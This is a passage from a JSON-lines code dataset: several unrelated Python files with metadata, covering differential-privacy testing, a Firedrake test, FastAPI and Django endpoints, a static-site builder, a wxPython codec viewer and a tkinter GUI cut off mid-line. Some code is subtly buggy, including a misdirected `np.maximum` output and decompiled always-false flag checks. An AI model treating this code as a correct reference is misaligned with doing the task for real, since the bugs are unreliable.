align=\"edge\")\n plt.bar(binlist[:-1], d2lower, alpha=0.5, width=np.diff(binlist), ec=\"k\", align=\"edge\")\n plt.legend(['D2', 'D1'], loc=\"upper right\")\n else:\n plt.bar(binlist[:-1], d2hist, alpha=0.5, width=np.diff(binlist), ec=\"k\", align=\"edge\")\n plt.bar(binlist[:-1], d1hist, alpha=0.5, width=np.diff(binlist), ec=\"k\", align=\"edge\")\n plt.legend(['D2', 'D1'], loc=\"upper right\")\n plt.show()\n\n # Check if histogram of fD1 values multiplied by e^epsilon and summed by delta is bounding fD2 and vice versa\n # Use the histogram results and create bounded histograms to compare in DP test\n def get_bounded_histogram(self, d1hist, d2hist, binlist, d1size, d2size, exact, alpha=0.05):\n d1_error_interval = 0.0\n d2_error_interval = 0.0\n # Lower and Upper bound\n if(not exact):\n num_buckets = binlist.size - 1\n critical_value = stats.norm.ppf(1-(alpha / 2 / num_buckets), loc=0.0, scale=1.0)\n d1_error_interval = critical_value * math.sqrt(num_buckets / d1size) / 2\n d2_error_interval = critical_value * math.sqrt(num_buckets / d2size) / 2\n\n num_buckets = binlist.size - 1\n px = np.divide(d1hist, d1size)\n py = np.divide(d2hist, d2size)\n\n d1histbound = px * math.exp(self.epsilon) + self.delta\n d2histbound = py * math.exp(self.epsilon) + self.delta\n\n d1upper = np.power(np.sqrt(px * num_buckets) + d1_error_interval, 2) / num_buckets\n d2upper = np.power(np.sqrt(py * num_buckets) + d2_error_interval, 2) / num_buckets\n d1lower = np.power(np.sqrt(px * num_buckets) - d1_error_interval, 2) / num_buckets\n d2lower = np.power(np.sqrt(py * num_buckets) - d2_error_interval, 2) / num_buckets\n\n np.maximum(d1lower, 0.0, d1lower)\n np.maximum(d2lower, 0.0, d1lower)\n\n d1histupperbound = d1upper * math.exp(self.epsilon) + self.delta\n d2histupperbound = d2upper * math.exp(self.epsilon) + self.delta\n \n return px, py, d1histupperbound, d2histupperbound, d1histbound, d2histbound, d1lower, d2lower\n\n # Differentially Private Predicate Test\n def dp_test(self, d1hist, d2hist, binlist, d1size, d2size, debug=False, exact=False):\n px, py, d1histupperbound, d2histupperbound, d1histbound, d2histbound, d1lower, d2lower = \\\n self.get_bounded_histogram(d1hist, d2hist, binlist, d1size, d2size, exact)\n if(debug):\n print(\"Parameters\")\n print(\"epsilon: \", self.epsilon, \" delta: \", self.delta)\n print(\"Bins\\n\", binlist)\n print(\"Original D1 Histogram\\n\", d1hist)\n print(\"Probability of D1 Histogram\\n\", px)\n print(\"D1 Lower\\n\", d1lower)\n print(\"D1 Upper\\n\", d1histupperbound)\n print(\"D1 Histogram to bound D2\\n\", d1histbound)\n print(\"Original D2 Histogram\\n\", d2hist)\n print(\"Probability of D2 Histogram\\n\", py)\n print(\"D2 Lower\\n\", d2lower)\n print(\"D2 Upper\\n\", d2histupperbound)\n print(\"D2 Histogram to bound D1\\n\", d2histbound)\n print(\"Comparison - D2 bound to D1\\n\", np.greater(d1hist, np.zeros(d1hist.size)), np.logical_and(np.greater(d1hist, np.zeros(d1hist.size)), np.greater(d1lower, d2histupperbound)))\n print(\"Comparison - D1 bound to D2\\n\", np.greater(d2hist, np.zeros(d2hist.size)), np.logical_and(np.greater(d2hist, np.zeros(d2hist.size)), np.greater(d2lower, d1histupperbound)))\n\n # Check if any of the bounds across the bins violate the relaxed DP condition\n bound_exceeded = np.any(np.logical_and(np.greater(d1hist, np.zeros(d1hist.size)), np.greater(d1lower, d2histupperbound))) or \\\n np.any(np.logical_and(np.greater(d2hist, np.zeros(d2hist.size)), np.greater(d2lower, d1histupperbound)))\n return not bound_exceeded, d1histupperbound, d2histupperbound, d1lower, d2lower\n\n # K-S Two sample test between the repeated query results on neighboring datasets\n def ks_test(self, fD1, fD2):\n return stats.ks_2samp(fD1, fD2)\n\n # Anderson Darling Test\n def anderson_ksamp(self, fD1, fD2):\n return stats.anderson_ksamp([fD1, fD2])\n\n # Kullback-Leibler divergence D(P || Q) for discrete distributions\n def kl_divergence(self, p, q):\n return np.sum(np.where(p != 0, p * np.log(p / q), 0))\n\n # Wasserstein Distance\n def wasserstein_distance(self, d1hist, d2hist):\n return stats.wasserstein_distance(d1hist, d2hist)\n\n # Verification of SQL aggregation mechanisms\n def aggtest(self, f, colname, numbins=0, binsize=\"auto\", debug=False, plot=True, bound=True, exact=False):\n d1, d2, d1_yaml_path, d2_yaml_path = self.generate_neighbors()\n \n fD1, fD2 = self.apply_aggregation_neighbors(f, (d1, colname), (d2, colname))\n d1size, d2size = fD1.size, fD2.size\n\n ks_res = self.ks_test(fD1, fD2)\n print(\"\\nKS 2-sample Test Result: \", ks_res, \"\\n\")\n \n #andderson_res = self.anderson_ksamp(fD1, fD2)\n #print(\"Anderson 2-sample Test Result: \", andderson_res, \"\\n\")\n \n d1hist, d2hist, bin_edges = \\\n self.generate_histogram_neighbors(fD1, fD2, numbins, binsize, exact=exact)\n \n #kl_res = self.kl_divergence(d1hist, d2hist)\n #print(\"\\nKL-Divergence Test: \", kl_res, \"\\n\")\n\n ws_res = 0.0\n dp_res = False\n if(exact):\n print(\"Wasserstein Distance Test: \", ws_res, \"\\n\")\n print(\"DP Predicate Test:\", dp_res, \"\\n\")\n return dp_res, ks_res, ws_res\n \n ws_res = self.wasserstein_distance(d1hist, d2hist)\n dp_res, d1histupperbound, d2histupperbound, d1lower, d2lower = self.dp_test(d1hist, d2hist, bin_edges, d1size, d2size, debug, exact=exact)\n print(\"Wasserstein Distance Test: \", ws_res, \"\\n\")\n print(\"DP Predicate Test:\", dp_res, \"\\n\")\n \n if(plot):\n self.plot_histogram_neighbors(fD1, fD2, d1histupperbound, d2histupperbound, d1hist, d2hist, d1lower, d2lower, bin_edges, bound, exact)\n return dp_res, ks_res, ws_res\n\n def accuracy_test(self, fD, bounds, confidence=0.95):\n # Actual mean of aggregation function f on D1 is equal to sample mean\n n = fD.size\n lower_bound = bounds[0]\n upper_bound = bounds[1]\n print(\"Confidence Level: \", confidence*100, \"%\")\n print(\"Bounds: [\", lower_bound, \", \", upper_bound, \"]\")\n print(\"Mean of noisy responses:\", np.mean(fD))\n print(\"Mean of upper and lower bound:\", (lower_bound + upper_bound) / 2.0)\n lower_bound = [lower_bound] * n\n upper_bound = [upper_bound] * n\n within_bounds = np.sum(np.logical_and(np.greater_equal(fD, lower_bound), np.greater_equal(upper_bound, fD)))\n print(\"Count of times noisy result within bounds:\", within_bounds, \"/\", n)\n print(\"Count of times noisy result outside bounds:\", n - within_bounds, \"/\", n)\n return (within_bounds / n >= confidence)\n\n # Applying queries repeatedly against SQL-92 implementation of Differential Privacy by Burdock\n def dp_query_test(self, d1_query, d2_query, debug=False, plot=True, bound=True, exact=False, repeat_count=10000, confidence=0.95):\n ag = agg.Aggregation(t=1, repeat_count=repeat_count)\n d1, d2, d1_yaml_path, d2_yaml_path = self.generate_neighbors(load_csv=True)\n fD1, fD1_bounds = ag.run_agg_query(d1, d1_yaml_path, d1_query, confidence)\n fD2, fD2_bounds = ag.run_agg_query(d2, d2_yaml_path, d2_query, confidence)\n acc_res = self.accuracy_test(fD1, fD1_bounds, confidence)\n d1hist, d2hist, bin_edges = self.generate_histogram_neighbors(fD1, fD2, binsize=\"auto\")\n d1size, d2size = fD1.size, fD2.size\n dp_res, d1histupperbound, d2histupperbound, d1lower, d2lower = self.dp_test(d1hist, d2hist, bin_edges, d1size, d2size, debug)\n if(plot):\n self.plot_histogram_neighbors(fD1, fD2, d1histupperbound, d2histupperbound, d1hist, d2hist, d1lower, d2lower, bin_edges, bound, exact)\n return dp_res, acc_res\n\n # Main method listing all the DP verification steps\n def main(self):\n #ag = agg.Aggregation(t=1, repeat_count=10000)\n #dp_exact, ks_exact, ws_exact = dv.aggtest(ag.exact_count, 'UserId', binsize = \"unity\", bound = False, exact = True)\n #dp_buggy, ks_buggy, ws_buggy = dv.aggtest(ag.buggy_count, 'UserId', binsize=\"auto\", debug=False,bound = True)\n #dp_count, ks_count, ws_count = dv.aggtest(ag.dp_count, 'UserId', binsize=\"auto\", debug = False)\n #dp_sum, ks_sum, ws_sum = dv.aggtest(ag.dp_sum, 'Usage', binsize=\"auto\")\n #dp_mean, ks_mean, ws_mean = dv.aggtest(ag.dp_mean, 'Usage', binsize=\"auto\", debug=False, plot=False)\n #dp_var, ks_var, ws_var = dv.aggtest(ag.dp_var, 'Usage', binsize=\"auto\", debug=False)\n d1_query = \"SELECT SUM(Usage) AS TotalUsage FROM d1.d1\"\n d2_query = \"SELECT SUM(Usage) AS TotalUsage FROM d2.d2\"\n dp_res, acc_res = self.dp_query_test(d1_query, d2_query, plot=False, repeat_count=10000)\n return dp_res, acc_res\n\nif __name__ == \"__main__\":\n dv = DPVerification(dataset_size=10000)\n print(dv.main())","sub_path":"evaluation/DPVerification.py","file_name":"DPVerification.py","file_ext":"py","file_size_in_byte":16315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"634551013","text":"import pytest\nfrom firedrake import *\nfrom ufl.algorithms.ad import expand_derivatives\nfrom irksome import GaussLegendre, Dt, TimeStepper\n\n\ndef heat_inhomog(N, deg, butcher_tableau):\n dt = Constant(1.0 / N)\n t = Constant(0.0)\n\n msh = UnitSquareMesh(N, N)\n\n V = FunctionSpace(msh, \"CG\", 1)\n x, y = SpatialCoordinate(msh)\n\n uexact = t*(x+y)\n rhs = expand_derivatives(diff(uexact, t)) - div(grad(uexact))\n\n u = interpolate(uexact, V)\n\n v = TestFunction(V)\n F = inner(Dt(u), v)*dx + inner(grad(u), grad(v))*dx - inner(rhs, v)*dx\n\n bc = DirichletBC(V, uexact, \"on_boundary\")\n\n luparams = {\"mat_type\": \"aij\",\n \"snes_type\": \"ksponly\",\n \"ksp_type\": \"preonly\",\n \"pc_type\": \"lu\"}\n\n stepper = TimeStepper(F, butcher_tableau, t, dt, u, bcs=bc,\n solver_parameters=luparams)\n\n while (float(t) < 1.0):\n if (float(t) + float(dt) > 1.0):\n dt.assign(1.0 - float(t))\n stepper.advance()\n t.assign(float(t) + float(dt))\n\n return norm(u-uexact)\n\n\n@pytest.mark.parametrize(('deg', 'N', 'time_stages'),\n [(1, 2**j, i) for j in range(2, 4)\n for i in (1, 2)]\n + [(2, 2**j, i) for j in range(2, 4)\n for i in (2, 3)])\ndef test_inhomog_bc(deg, N, time_stages):\n error = heat_inhomog(N, deg, GaussLegendre(time_stages))\n assert abs(error) < 1e-10\n","sub_path":"tests/test_inhomogbc.py","file_name":"test_inhomogbc.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"91199310","text":"import uuid\n\nfrom typing import Dict\n\nfrom fastapi import APIRouter, HTTPException, Depends\n\nfrom ..database import DBSession, get_db\nfrom ..models import User\n\nrouter = APIRouter()\n\n@router.get(\n '/{username}',\n summary='Reads user',\n description='Reads User from username.',\n response_model=User,\n)\nasync def read_user(username: str, db: DBSession = Depends(get_db)):\n try:\n return db.read_user(username)\n except KeyError as exception:\n raise HTTPException(\n status_code=404,\n detail='User not found',\n ) from exception\n\n@router.post(\n '',\n summary='Creates a new user',\n description='Creates a new user and returns its username.',\n response_model=str,\n)\nasync def create_user(user: User, db: DBSession = Depends(get_db)):\n return db.create_user(user)\n\n@router.put(\n '/{username}',\n summary='Replaces a user',\n description='Replaces a user identified by its username.',\n)\nasync def replace_user(\n username: str,\n user: User,\n db: DBSession = Depends(get_db),\n):\n try:\n db.replace_user(username, user)\n except KeyError as exception:\n raise HTTPException(\n status_code=404,\n detail='User not found',\n ) from exception\n\n@router.patch(\n '/{username}',\n summary='Alters user',\n description='Alters a user identified by its username',\n)\nasync def alter_user(\n username: str,\n item: User,\n db: DBSession = Depends(get_db),\n):\n try:\n old_item = db.read_user(username)\n update_data = item.dict(exclude_unset=True)\n new_item = old_item.copy(update=update_data)\n db.replace_user(username, new_item)\n except KeyError as exception:\n raise HTTPException(\n status_code=404,\n detail='User not found',\n ) from exception\n\n@router.delete(\n '/{username}',\n summary='Deletes user',\n description='Deletes a user identified by its username',\n)\nasync def remove_user(username: str, db: DBSession = Depends(get_db)):\n try:\n db.remove_user(username)\n except KeyError as exception:\n raise HTTPException(\n status_code=404,\n detail='User not found',\n ) from exception\n\n\n@router.delete(\n '',\n summary='Deletes all users, use with caution',\n description='Deletes all users, use with caution',\n)\nasync def remove_all_users(db: DBSession = Depends(get_db)):\n db.remove_all_users()","sub_path":"tasklist/tasklist/routers/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"367733719","text":"from django.urls import path, include\nfrom .import views\n\napp_name = \"download\"\nurlpatterns = [\n path('download/', views.download, name = \"download\"),\n path('download/upload/',views.upload_stw, name=\"upload_stw\"),\n path('download/soft_list/', views.soft_list, name=\"soft_stw\"),\n path('download/', views.delete_stw,name=\"delete_stw\"),\n# path(\"api/\", views.api_data, name=\"api_data\"),\n# path('change/', views.update_api_data, name=\"update_api_data\")\n]","sub_path":"register-master/register-master/soft_developers_ADC3-master/webdevelopmentstore/download/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"121556594","text":"from jinja2 import Environment, FileSystemLoader\nimport os\nimport json\nimport shutil\n\nwith open('data.json') as fobj:\n site_data = json.load(fobj)\n\nfile_loader = FileSystemLoader(\"template\")\nenv = Environment(loader=file_loader)\n\ntemplate = env.get_template('content.html').render(site_data)\n\npublic_dir = os.path.join(os.getcwd(),\"public\")\n\n#if path already exists, remove it before copying with copytree()\nif os.path.exists(public_dir):\n shutil.rmtree(public_dir)\nshutil.copytree(os.path.join(os.getcwd(),\"template/static\"), public_dir)\n\nwith open(os.path.join(public_dir,\"index.html\"),\"w\") as fobj:\n fobj.writelines(template)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"324206471","text":"import requests\r\nimport json\r\n\r\n\r\ncovid_api_url = requests.get(\"https://api.covid19india.org/data.json\")\r\n\r\napi = json.loads(covid_api_url.content)\r\n\r\nstate_search = api[\"statewise\"]\r\n\r\n# a = str(input(\"enter\"))\r\n\r\n\r\ndef searchedData(state_name):\r\n\r\n for i in state_search:\r\n if i[\"state\"].lower() == state_name.lower():\r\n return i['active'], i['confirmed'], i['deaths'], i['recovered'], i['lastupdatedtime']\r\n\r\n\r\ndef indiacases():\r\n india = api[\"statewise\"][0]\r\n\r\n return india['active'], india['confirmed'], india['deaths'], india['recovered'], india['lastupdatedtime']\r\n","sub_path":"Covid Updater/telegramBot/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"466970700","text":"import os\nimport json\nimport random\nimport datetime\n\nimport phonenumbers\n\nfrom hackinit.settings import MEDIA_ROOT\nfrom hackinit.shortcuts import *\nfrom .models import *\n\nfrom django.shortcuts import render\nfrom django.views.decorators.http import require_http_methods\nfrom django.http import JsonResponse\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import ValidationError\nfrom django.db import IntegrityError\n\nalphabet = \"abcdefghijklmnopqrstuvwxyz0123456789\"\n\ndef random_string(length):\n ans = \"\"\n for i in range(length):\n ans += alphabet[random.randint(0, len(alphabet) - 1)]\n return ans\n\ndef valid_cellphone(cellphone):\n x = phonenumbers.parse(cellphone, \"CN\")\n return \"+%s%s\" % (x.country_code, x.national_number)\n\ndef valid_resume(path):\n if path == None:\n return None\n full_path = \"resume/\" + path\n if os.path.isfile(MEDIA_ROOT + full_path):\n return full_path\n else:\n raise Exception\n\ndef valid_user(email):\n return User.objects.get(username=email)\n\ndef valid_date(year, month, day):\n return datetime.date(year, month, day)\n\n@require_http_methods([\"POST\"])\ndef upload_application(request):\n try:\n body = json.loads(request.body)\n user = valid_user(body[\"email\"])\n name = body[\"name\"]\n gender = body[\"gender\"]\n birth_year = body[\"birth_year\"]\n birth_month = body[\"birth_month\"]\n birth_day = body[\"birth_day\"]\n birth = valid_date(birth_year, birth_month, birth_day)\n school = body[\"school\"]\n city = body[\"city\"]\n province = body[\"province\"]\n grade = body[\"grade\"]\n grade_other = body[\"grade_other\"] if grade == \"OTHR\" else None\n mobile = valid_cellphone(body[\"mobile\"])\n wechat = body.get(\"wechat\", None)\n linkedin = body.get(\"linkedin\", None)\n github = body.get(\"github\", None)\n devpost = body.get(\"devpost\", None)\n website = body.get(\"website\", None)\n skills = body[\"skills\"]\n other_skills = body.get(\"other_skills\", None)\n is_guru = body[\"is_guru\"]\n is_ca = body[\"is_ca\"]\n hackathon_experience = body[\"hackathon_experience\"]\n project = body[\"project\"]\n how_know_hackinit = body[\"how_know_hackinit\"]\n how_know_hackinit_other = body[\"how_know_hackinit_other\"] if how_know_hackinit == \"O\" else None\n\n if is_guru:\n help_experience = body[\"help_experience\"]\n resume = valid_resume(body[\"resume\"])\n why_interested_stem = None\n tech_issue = None\n else:\n why_interested_stem = body[\"why_interested_stem\"]\n tech_issue = body[\"tech_issue\"]\n resume = valid_resume(body.get(\"resume\", None))\n help_experience = None\n\n have_team = body[\"have_team\"]\n if have_team:\n number_member = body[\"number_member\"]\n captain_name = body[\"captain_name\"]\n captain_email = body[\"captain_email\"]\n members = body[\"members\"]\n assign_team = None\n else:\n assign_team = body[\"assign_team\"]\n number_member = None\n captain_name = None\n captain_email = None\n members = None\n except:\n return parameter_error\n\n try:\n app = ParticipantApplication.objects.create(\n user=user,\n name=name,\n gender=gender,\n birth=birth,\n school=school,\n city=city,\n province=province,\n grade=grade,\n grade_other=grade_other,\n mobile=mobile,\n wechat=wechat,\n linkedin=linkedin,\n github=github,\n devpost=devpost,\n website=website,\n other_skills=other_skills,\n is_guru=is_guru,\n is_ca=is_ca,\n hackathon_experience=hackathon_experience,\n project=project,\n help_experience=help_experience,\n how_know_hackinit=how_know_hackinit,\n how_know_hackinit_other=how_know_hackinit_other,\n why_interested_stem=why_interested_stem,\n tech_issue=tech_issue,\n resume=resume,\n have_team=have_team,\n assign_team=assign_team,\n number_member=number_member,\n captain_name=captain_name,\n captain_email=captain_email,\n members=members\n )\n for s in skills:\n skill, created = Skill.objects.get_or_create(skill=s)\n app.skills.add(skill)\n except (ValidationError, User.DoesNotExist, ValueError):\n return parameter_error\n except IntegrityError:\n return duplicate_error\n except:\n return server_error\n\n return JsonResponse({\n \"email\": user.email,\n \"status\": 200,\n \"message\": \"participant application submitted\"\n })\n\n@require_http_methods([\"POST\"])\ndef upload_resume(request):\n try:\n resume = request.FILES[\"resume\"]\n filename = resume.name\n except:\n return parameter_error\n\n filename = \"application_\" + random_string(20) + \"_\" + filename\n\n with open(MEDIA_ROOT + \"resume/\" + filename, \"wb+\") as f:\n for chunk in resume.chunks():\n f.write(chunk)\n\n return JsonResponse({\n \"filename\": filename,\n \"status\": 200,\n \"message\": \"resume uploaded\"\n })\n\n@require_http_methods([\"GET\"])\ndef check_application_exists(request):\n if request.user.is_authenticated():\n try:\n app = ParticipantApplication.objects.get(user=request.user)\n return JsonResponse({\n \"email\": request.user.email,\n \"message\": \"application found\"\n })\n except ParticipantApplication.DoesNotExist:\n return not_found_error\n except:\n return server_error\n else:\n return not_found_error\n\n@require_http_methods([\"GET\"])\ndef fetch_status(request):\n if request.user.is_authenticated():\n try:\n app = ParticipantApplication.objects.get(user=request.user)\n if app.status in [\"A\", \"W\", \"R\"] and not app.email_sent:\n status = \"P\"\n else:\n status = app.status\n return JsonResponse({\n \"email\": request.user.email,\n \"application_status\": status,\n \"reimbursement_cap\": app.reimbursement_cap,\n \"message\": \"application status found\"\n })\n except ParticipantApplication.DoesNotExist:\n return JsonResponse({\n \"email\": request.user.email,\n \"application_status\": \"N\",\n \"reimbursement_cap\": None,\n \"message\": \"application status found\"\n })\n except:\n return server_error\n else:\n return not_found_error\n\n@require_http_methods([\"GET\"])\ndef decline_invitation(request):\n if request.user.is_authenticated():\n try:\n app = ParticipantApplication.objects.get(user=request.user)\n ParticipantApplication.objects.filter(pk=app.pk).update(status=\"D\")\n return JsonResponse({\n \"email\": request.user.email,\n \"message\": \"invitation declined\"\n })\n except ParticipantApplication.DoesNotExist:\n return not_found_error\n except:\n return server_error\n else:\n return not_found_error\n","sub_path":"django/application/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"471193731","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/gianluca/Pubblici/GIThub/MASTER/Videomass/videomass3/vdms_frames/ffmpeg_codecs.py\n# Compiled at: 2020-05-11 07:27:34\n# Size of source mod 2**32: 9701 bytes\nimport wx\n\nclass FFmpeg_Codecs(wx.MiniFrame):\n __doc__ = '\\n It shows a dialog box with a pretty kind of GUI to view\\n the formats available on FFmpeg\\n '\n\n def __init__(self, dict_decoders, OS, type_opt):\n \"\"\"\n with 'None' not depend from parent:\n wx.Dialog.__init__(self, None, style=wx.DEFAULT_DIALOG_STYLE)\n\n With parent, -1:\n wx.Dialog.__init__(self, parent, -1, style=wx.DEFAULT_DIALOG_STYLE)\n if close videomass also close parent window:\n \"\"\"\n if type_opt == '-encoders':\n cod = _('CODING ABILITY')\n colctrl = 'ORANGE'\n title = _('Videomass: FFmpeg encoders')\n else:\n cod = _('DECODING CAPABILITY')\n colctrl = 'SIENNA'\n title = _('Videomass: FFmpeg decoders')\n wx.MiniFrame.__init__(self, None)\n self.panel = wx.Panel(self, (wx.ID_ANY), style=(wx.TAB_TRAVERSAL))\n sizer_base = wx.BoxSizer(wx.VERTICAL)\n notebook = wx.Notebook(self.panel, wx.ID_ANY)\n sizer_base.Add(notebook, 1, wx.ALL | wx.EXPAND, 5)\n nb_panel_1 = wx.Panel(notebook, wx.ID_ANY)\n vid = wx.ListCtrl(nb_panel_1, (wx.ID_ANY), style=(wx.LC_REPORT | wx.SUNKEN_BORDER))\n sizer_tab1 = wx.BoxSizer(wx.VERTICAL)\n sizer_tab1.Add(vid, 1, wx.ALL | wx.EXPAND, 5)\n nb_panel_1.SetSizer(sizer_tab1)\n notebook.AddPage(nb_panel_1, _('Video'))\n nb_panel_2 = wx.Panel(notebook, wx.ID_ANY)\n aud = wx.ListCtrl(nb_panel_2, (wx.ID_ANY), style=(wx.LC_REPORT | wx.SUNKEN_BORDER))\n sizer_tab2 = wx.BoxSizer(wx.VERTICAL)\n sizer_tab2.Add(aud, 1, wx.ALL | wx.EXPAND, 5)\n nb_panel_2.SetSizer(sizer_tab2)\n notebook.AddPage(nb_panel_2, _('Audio'))\n nb_panel_3 = wx.Panel(notebook, wx.ID_ANY)\n sub = wx.ListCtrl(nb_panel_3, (wx.ID_ANY), style=(wx.LC_REPORT | wx.SUNKEN_BORDER))\n sizer_tab3 = wx.BoxSizer(wx.VERTICAL)\n sizer_tab3.Add(sub, 1, wx.ALL | wx.EXPAND, 5)\n nb_panel_3.SetSizer(sizer_tab3)\n notebook.AddPage(nb_panel_3, _('Subtitle'))\n stext = wx.StaticText(self.panel, wx.ID_ANY, '')\n sizer_base.Add(stext, 0, wx.ALL | wx.EXPAND, 5)\n button_close = wx.Button(self.panel, wx.ID_CLOSE, '')\n grid_buttons = wx.GridSizer(1, 1, 0, 0)\n grid_buttons.Add(button_close, 1, wx.ALL, 5)\n sizer_base.Add(grid_buttons, flag=(wx.ALIGN_RIGHT | wx.RIGHT), border=0)\n self.panel.SetSizerAndFit(sizer_base)\n self.Layout()\n self.SetTitle(title)\n self.SetMinSize((700, 500))\n vid.InsertColumn(0, 'codec', width=150)\n vid.InsertColumn(1, 'F', width=40)\n vid.InsertColumn(2, 'S', width=40)\n vid.InsertColumn(3, 'X', width=40)\n vid.InsertColumn(4, 'B', width=40)\n vid.InsertColumn(5, 'D', width=40)\n vid.InsertColumn(6, (_('description')), width=450)\n aud.InsertColumn(0, 'codec', width=150)\n aud.InsertColumn(1, 'F', width=40)\n aud.InsertColumn(2, 'S', width=40)\n aud.InsertColumn(3, 'X', width=40)\n aud.InsertColumn(4, 'B', width=40)\n aud.InsertColumn(5, 'D', width=40)\n aud.InsertColumn(6, (_('description')), width=450)\n sub.InsertColumn(0, 'codec', width=150)\n sub.InsertColumn(1, 'F', width=40)\n sub.InsertColumn(2, 'S', width=40)\n sub.InsertColumn(3, 'X', width=40)\n sub.InsertColumn(4, 'B', width=40)\n sub.InsertColumn(5, 'D', width=40)\n sub.InsertColumn(6, (_('description')), width=450)\n if OS == 'Darwin':\n vid.SetFont(wx.Font(12, wx.MODERN, wx.NORMAL, wx.NORMAL))\n aud.SetFont(wx.Font(12, wx.MODERN, wx.NORMAL, wx.NORMAL))\n sub.SetFont(wx.Font(12, wx.MODERN, wx.NORMAL, wx.NORMAL))\n stext.SetFont(wx.Font(11, wx.SWISS, wx.ITALIC, wx.NORMAL))\n else:\n vid.SetFont(wx.Font(9, wx.MODERN, wx.NORMAL, wx.NORMAL))\n aud.SetFont(wx.Font(9, wx.MODERN, wx.NORMAL, wx.NORMAL))\n sub.SetFont(wx.Font(9, wx.MODERN, wx.NORMAL, wx.NORMAL))\n stext.SetFont(wx.Font(8, wx.SWISS, wx.ITALIC, wx.NORMAL))\n leg = 'F = frame-level multithreading\\nS = slice-level multithreading\\nX = Codec is experimental\\nB = Supports draw_horiz_band\\nD = Supports direct rendering method 1'\n stext.SetLabel(leg)\n index = 0\n vcodlist = dict_decoders['Video']\n if not vcodlist:\n print('No ffmpeg codecs available')\n else:\n vid.InsertItem(index, cod)\n vid.SetItemBackgroundColour(index, colctrl)\n for a in vcodlist:\n index += 1\n vid.InsertItem(index, a[6:].split(' ')[1])\n if 'F' in a[1]:\n vid.SetItem(index, 1, 'YES')\n if 'S' in a[2]:\n vid.SetItem(index, 2, 'YES')\n if 'X' in a[3]:\n vid.SetItem(index, 3, 'YES')\n if 'B' in (4, ):\n vid.SetItem(index, 4, 'YES')\n if 'D' in (5, ):\n vid.SetItem(index, 5, 'YES')\n d = ' '.join(a.split()).split(None, 2)[2]\n if len(d):\n vid.SetItem(index, 6, d)\n else:\n vid.SetItem(index, 6, '')\n\n index = 0\n acodlist = dict_decoders['Audio']\n if not acodlist:\n print('No ffmpeg codecs available')\n else:\n aud.InsertItem(index, cod)\n aud.SetItemBackgroundColour(index, colctrl)\n for a in acodlist:\n index += 1\n aud.InsertItem(index, a[6:].split(' ')[1])\n if 'F' in a[1]:\n aud.SetItem(index, 1, 'YES')\n if 'S' in a[2]:\n aud.SetItem(index, 2, 'YES')\n if 'X' in a[3]:\n aud.SetItem(index, 3, 'YES')\n if 'B' in (4, ):\n aud.SetItem(index, 4, 'YES')\n if 'D' in (5, ):\n aud.SetItem(index, 5, 'YES')\n d = ' '.join(a.split()).split(None, 2)[2]\n if len(d):\n aud.SetItem(index, 6, d)\n else:\n aud.SetItem(index, 6, '')\n\n index = 0\n scodlist = dict_decoders['Subtitle']\n if not scodlist:\n print('No ffmpeg codecs available')\n else:\n sub.InsertItem(index, cod)\n sub.SetItemBackgroundColour(index, colctrl)\n for a in scodlist:\n index += 1\n sub.InsertItem(index, a[6:].split(' ')[1])\n if 'F' in a[1]:\n sub.SetItem(index, 1, 'YES')\n if 'S' in a[2]:\n sub.SetItem(index, 2, 'YES')\n if 'X' in a[3]:\n sub.SetItem(index, 3, 'YES')\n if 'B' in (4, ):\n sub.SetItem(index, 4, 'YES')\n if 'D' in (5, ):\n sub.SetItem(index, 5, 'YES')\n d = ' '.join(a.split()).split(None, 2)[2]\n if len(d):\n sub.SetItem(index, 6, d)\n else:\n sub.SetItem(index, 6, '')\n\n self.Bind(wx.EVT_BUTTON, self.on_close, button_close)\n self.Bind(wx.EVT_CLOSE, self.on_close)\n\n def on_close(self, event):\n self.Destroy()","sub_path":"pycfiles/videomass-2.1.7-py3-none-any/ffmpeg_codecs.cpython-37.py","file_name":"ffmpeg_codecs.cpython-37.py","file_ext":"py","file_size_in_byte":7726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"555193945","text":"import tkinter as tk\nfrom client.agent_trait_scale import AgentTraitScale\nfrom agents.flock_agent import FlockAgent\nfrom agents.lighthouse_agent import LighthouseAgent\nfrom agents.green_lighthouse import GreenLighthouse\nfrom agents.red_lighthouse import RedLighthouse\nfrom random import random\nimport numpy as np\n\nclass GUI(tk.Tk):\n\tdef __init__(self, context, *args, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\n\t\t# variables\n\t\tself.context = context\n\t\tself.sim_width = context.width #px\n\n\t\tself.fps = tk.IntVar(self, 30)\n\t\tself.__running = None\n\t\tself.__id_auto_render = None\n\n\t\tself.__sim_running = False\n\t\tself.__id_auto_sim = None\n\t\tself.tps = 20\n\n\t\tself.fpop = tk.IntVar(self, 40)\n\t\tself.lhpop = tk.IntVar(self, 0)\n\n\t\t# frames\n\t\tsettings_frame = tk.Frame(self, padx=15)\n\t\tsettings_frame.grid(row=0, column=0)\n\t\tflock_settings_frame = tk.LabelFrame(settings_frame, text=\"flock settings\")\n\t\tflock_settings_frame.grid(row=0, column=0)\n\t\tlh_settings_frame = tk.LabelFrame(settings_frame, text=\"lighthouse settings\")\n\t\tlh_settings_frame.grid(row=0, column=1)\n\t\tfield_frame = tk.Frame(self, padx=15)\n\t\tfield_frame.grid(row=0, 